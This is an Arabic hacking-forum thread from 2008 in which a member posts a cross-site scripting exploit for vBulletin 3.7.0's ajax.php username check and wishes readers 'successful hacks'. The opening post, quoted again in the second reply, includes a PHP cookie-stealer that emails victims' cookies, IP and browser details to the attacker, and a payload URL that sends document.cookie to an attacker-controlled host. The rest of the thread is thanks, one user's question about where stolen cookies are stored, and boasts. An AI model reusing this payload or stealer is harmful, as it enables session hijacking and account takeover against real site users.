التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-09-2008, 01:04 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية d4rK-h4ck3r
 

 

 
إحصائية العضو







d4rK-h4ck3r غير متواجد حالياً

إرسال رسالة عبر MSN إلى d4rK-h4ck3r

 

 

إحصائية الترشيح

عدد النقاط : 10
d4rK-h4ck3r is on a distinguished road

.................... ثغرة خطير في vBulletin 3.7.0


السلام عليكم


بدون مقدمآت


الثغرة في ملف ajax.php

vBulletin 3.7.0 <= XSS Explot
ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0

ajaxReg:
ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum
الثغرة :

كود PHP:

http
://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=***************('xss');</script> 
آعمل ملف جديد


كود PHP:
File.php
<?

Ip = $ _SERVER ’REMOTE_ADDR’];
UserAgent = $ _SERVER ’HTTP_USER_AGENT’];
$Accept $ = $ _SERVER ’HTTP_ACCEPT_LANGUAGE’];
$Co okie = $ _GET ’c’];
$Myemail "YOUR E-MAIL;
$Date = today ( "lj FYgia");
$Subject = "Xss th30nR";
$Message = "Th30nuR () 2006
Ip
: $ ip
Coo kies
: $ coo kies
Browser
: $ userAgent
Language
: $ accept
URL
Basic $
Day Time: $ today \\\\ n";
$ From = "
From: $ myemail \\\\ \\\\ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>
تطبيق:
كود PHP:
www.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script 
مع انك تشيل الفراغات اللي في coo kie
وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz برنامج لاضهار ملفات اي الموقع مميز جدا وخطير جدا يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu


eyvm o'dv td vBulletin 3>7>0

التوقيع





DДЯk ĦДCkЄЯ
غائب لسنة كاملة بسبب الدراسة الجامعية


 


التعديل الأخير تم بواسطة d4rK-h4ck3r ; 11-09-2008 الساعة 02:41 AM.

   

رد مع اقتباس
قديم 11-09-2008, 01:14 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية PASSEWORD
 

 

 
إحصائية العضو








PASSEWORD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PASSEWORD is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Da®k H@©K3R
السلام عليكم


بدون مقدمآت


الثغرة في ملف ajax.php

vBulletin 3.7.0 <= XSS Explot
ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0

ajaxReg:
ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum
الثغرة :
كود PHP:

http
://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=***************('xss');</script> 
آعمل ملف جديد


كود PHP:
File.php
<?

Ip = $ _SERVER ’REMOTE_ADDR’];
UserAgent = $ _SERVER ’HTTP_USER_AGENT’];
$Accept $ = $ _SERVER ’HTTP_ACCEPT_LANGUAGE’];
$Co okie = $ _GET ’c’];
$Myemail "YOUR E-MAIL;
$Date = today ( "lj FYgia");
$Subject = "Xss th30nR";
$Message = "Th30nuR () 2006
Ip
: $ ip
Coo kies
: $ coo kies
Browser
: $ userAgent
Language
: $ accept
URL
Basic $
Day Time: $ today \\\\ n";
$ From = "
From: $ myemail \\\\ \\\\ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>
تطبيق:
كود PHP:

www
.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script>

مع انك تشيل الفراغات اللي في coo kie 
وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz برنامج لاضهار ملفات اي الموقع مميز جدا وخطير جدا يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu

دائما مبدع كالعادة
شكرا على الاهداء
التوقيع

*********************
حكمة : كل انسان يستطيع ان يكون الاول اذا اراد ذلك

 

   

رد مع اقتباس
قديم 11-09-2008, 02:03 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية ZHech
 

 

 
إحصائية العضو






ZHech غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ZHech is on a distinguished road

افتراضي


شكراشكرا

التوقيع

تونسي و أفتخر

الأيام بيننا يا عبّاد الصليب
http://img367.imageshack.us/img367/8710/au002cf5.gif
http://img216.imageshack.us/img216/5839/texthp2.gif
ZH@1.com
إميلي الجديد
ZH1@w.cn
لا أحد يولد محترف و لكن يولد ليكون فى المستقبل محترف....

( سوف تقل مشاركاتي بالمنتدى بسبب إمتحانات البرمجة بالجامعة... لنا عودة )

 

   

رد مع اقتباس
قديم 11-09-2008, 02:50 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية d4rK-h4ck3r
 

 

 
إحصائية العضو







d4rK-h4ck3r غير متواجد حالياً

إرسال رسالة عبر MSN إلى d4rK-h4ck3r

 

 

إحصائية الترشيح

عدد النقاط : 10
d4rK-h4ck3r is on a distinguished road

افتراضي


مشكور على مرورك يا الغالين ننتظروا جديدكم

التوقيع





DДЯk ĦДCkЄЯ
غائب لسنة كاملة بسبب الدراسة الجامعية


 

   

رد مع اقتباس
قديم 11-10-2008, 04:46 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
The Final Doom
:: vBspiders Founder ::
 
الصورة الرمزية The Final Doom
 

 

 
إحصائية العضو









The Final Doom غير متواجد حالياً

إرسال رسالة عبر ICQ إلى The Final Doom إرسال رسالة عبر AIM إلى The Final Doom إرسال رسالة عبر MSN إلى The Final Doom إرسال رسالة عبر Yahoo إلى The Final Doom إرسال رسالة عبر Skype إلى The Final Doom

 

 

إحصائية الترشيح

عدد النقاط : 12
The Final Doom is on a distinguished road

افتراضي


تسلـــم يا باشا على الثغرة

التوقيع




In God, You have to trust

$Contact
Skype:imadgb20
//
\\




 

   

رد مع اقتباس
قديم 11-10-2008, 10:53 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية كنكشن
 

 

 
إحصائية العضو





كنكشن غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
كنكشن is on a distinguished road

افتراضي


اخوي عندي كم سؤال

س1: طيب ممكن توضح اكثر اين يخزن الكوكز او الباسورد هل يرسل على الايميل اما ماذا وين احط الايميل او ملف txt عشان تتخزن فيه معلومات الكوكز


س2: الملف هذا هل يمكن ان استخدمه في اي ثغر xss بعض ثغرة الميل روم يحط كود الثغره بعدين قوسين ويكتب xss يعني احط الملف هذا يصلح طبعا بعد رفعه على موقعي الخاص

رجاء الرد انا بحاجه للاجوبه.............................

   

رد مع اقتباس
قديم 11-10-2008, 10:58 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية d4rK-h4ck3r
 

 

 
إحصائية العضو







d4rK-h4ck3r غير متواجد حالياً

إرسال رسالة عبر MSN إلى d4rK-h4ck3r

 

 

إحصائية الترشيح

عدد النقاط : 10
d4rK-h4ck3r is on a distinguished road

افتراضي


مشكورين على المرور و بالنسبة للاخ كنكشن ساعمل موضوع عما قريب لجميع اسئلتك لكن اصبر علي شوي لان المدة هذي امتحانات ادعولي شباب

التوقيع





DДЯk ĦДCkЄЯ
غائب لسنة كاملة بسبب الدراسة الجامعية


 

   

رد مع اقتباس
قديم 11-11-2008, 08:58 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية hacker_dz
 

 

 
إحصائية العضو





hacker_dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hacker_dz is on a distinguished road

افتراضي


شكراشكرا

   

رد مع اقتباس
قديم 11-12-2008, 09:10 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Dr-j0k
 

 

 
إحصائية العضو





Dr-j0k غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr-j0k is on a distinguished road

افتراضي


مشكوووور خويا العزيز والله مبدعبطل

التوقيع


===================
ki5@hotmail.fr

===================

اسفس و ندمي على كبيران بنغيب سنين عن الهكر وعندما نعود نجد الصبيان صارو يتكلمون عن برايفت يا والله حوال ما كنا مثلكم قبل
سلام ان شاء الله ما في شيء برايفت معنا ;)

 

   

رد مع اقتباس
قديم 11-16-2008, 10:46 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية كنكشن
 

 

 
إحصائية العضو





كنكشن غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
كنكشن is on a distinguished road

افتراضي


Da®k H@©K3R

مشكور اخوي وفي انتظارك

   

رد مع اقتباس
قديم 11-21-2008, 11:04 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية PROF
 

 

 
إحصائية العضو







PROF غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى PROF

 

 

إحصائية الترشيح

عدد النقاط : 10
PROF is on a distinguished road

افتراضي


شكرا اخي علي الثغرة

التوقيع

EgYpT@ My BlOoD


 

   

رد مع اقتباس
قديم 11-21-2008, 12:04 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
إحصائية العضو





Hacking ghost غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Hacking ghost is on a distinguished road

افتراضي


مشكوور على الثغرة طخطخطخ

   

رد مع اقتباس
قديم 11-24-2008, 02:01 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
إحصائية العضو







العربي الصغير غير متواجد حالياً

إرسال رسالة عبر MSN إلى العربي الصغير

 

 

إحصائية الترشيح

عدد النقاط : 10
العربي الصغير is on a distinguished road

افتراضي


تسلم يدك اخي شكراً جزيلاً لك

التوقيع

http://img295.imageshack.us/img295/8...e819673un5.gif

 

   

رد مع اقتباس
قديم 11-27-2008, 04:15 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
EXE
.::TuNiSiAn EviLs::.
 
الصورة الرمزية EXE
 

 

 
إحصائية العضو





EXE غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
EXE is on a distinguished road

افتراضي


العب مع التونسين و مت كالباقين

التوقيع


HTTP@Hacker.ExE
تعشق الموت لكي لا تعشقنا الحياة
فدخلت مدارس الهاكر لتعاقب الحقراء
فتعملت فنون الهاكر بكل أنواع الجنون
تعلمت حين تقول نعم ... فقط من أجل العيون
الهاكر حرب ... وكل من قادها يا عمرى مجنون
لا تسأل من تكون ؟
انت من كتب دستور الهاكر ... وأنت من وضع له قانون

http://img268.imageshack.us/img268/8493/ellaho.jpg

 

   

رد مع اقتباس
قديم 11-27-2008, 04:43 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
إحصائية العضو





.: Dr.SmOoK :. غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
.: Dr.SmOoK :. is on a distinguished road

افتراضي


يعطيك العافيه

لكن النسخه هذي قديمه

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة أمنية خطيرة في vBulletin v3.8.6 DannY.IraQi قســم تطويــر المــــواقع 1 07-25-2010 06:16 PM
ثغرة XSS في النسخة vbulletin 4.0.2 xman2 قســم تطويــر المــــواقع 1 05-08-2010 01:22 AM
هل يوجد ثغرة vBulletin 3.8.3 hacks قســم إختــراق الأجهــزة 3 10-16-2009 07:45 PM
[ خبـر ] : وجود ثغرة vBulletin 3.8.4 PL1 XSS xman2 قســم تطويــر المــــواقع 0 10-08-2009 09:42 PM
خطير ثغرة تصيب كل المنتديات xman2 قســم تطويــر المــــواقع 0 05-27-2009 01:31 AM


الساعة الآن 02:46 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0